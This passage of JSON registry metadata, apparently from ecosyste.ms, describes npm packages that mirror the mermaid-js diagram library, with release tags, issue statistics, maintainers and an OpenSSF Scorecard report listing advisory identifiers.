sts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.353Z","dependent_packages_count":0,"downloads":34,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":34.050031845431626,"dependent_packages_count":48.51089438751708,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":41.28046311647435},"purl":"pkg:npm/mermaid-elk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mermaid-elk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/mermaid-elk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mermaid-elk/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-elk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-elk/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-elk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-elk/related_packages","maintainers":[{"uuid":"zywu","login":"zywu","name":null,"email":"1061096367@qq.com","url":null,"packages_count":1,"html_url":"https://www.npmjs.com/~zywu","role":null,"created_at":"2024-01-03T07:35:19.854Z","updated_at":"2024-01-03T07:35:19.854Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zywu/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12018445,"name":"mermaid-patch-for-node","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph","mindmap","packet diagram","c4 diagram","er diagram","pie chart","pie diagram","quadrant chart","requirement diagram","graph"],"namespace":null,"versions_count":1,"first_release_published_at":"2025-08-18T12:17:04.276Z","latest_release_published_at":"2025-08-18T12:17:04.276Z","latest_release_number":"11.9.0-patch.0","last_synced_at":"2025-09-01T12:55:57.138Z","created_at":"2025-08-18T12:17:19.190Z","updated_at":"2025-09-01T14:17:50.351Z","registry_url":"https://www.npmjs.com/package/mermaid-patch-for-node","install_command":"npm install mermaid-patch-for-node","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"patch":"11.9.0-patch.0","latest":"11.9.0-patch.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is 